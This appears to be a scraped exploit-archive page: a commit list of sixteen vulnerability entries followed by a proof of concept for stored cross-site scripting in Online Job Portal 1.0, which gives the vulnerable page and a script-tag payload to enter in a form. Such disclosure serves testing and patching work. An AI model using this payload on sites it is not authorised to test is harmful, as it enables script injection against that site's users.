ae14b71248
16 changes to exploits/shellcodes Tourism Management System 1.0 - Arbitrary File Upload Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection Online Student's Management System 1.0 - Remote Code Execution (Authenticated) Online Discussion Forum Site 1.0 - XSS in Messaging System Online Job Portal 1.0 - Cross Site Scripting (Stored) HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal HiSilicon Video Encoders - RCE via unauthenticated command injection HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware HiSilicon Video Encoders - Full admin access via backdoor password HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS) Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields) Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated) Textpattern CMS 4.6.2 - Cross-site Request Forgery
17 lines
No EOL
574 B
Text
17 lines
No EOL
574 B
Text
# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
|
||
# Google Dork: N/A
|
||
# Date: 2020/10/17
|
||
# Exploit Author: Akıner Kısa
|
||
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
|
||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
|
||
# Version: 1.0
|
||
# Tested on: XAMPP
|
||
# CVE : N/A
|
||
|
||
Proof of Concept:
|
||
|
||
1 - Open URL http://localhost/jobportal/Employer/ManageJob.php
|
||
|
||
2 - Fill in the blanks with this payload: "><script>alert (1)</script>
|
||
|
||
3 - And click submit button. |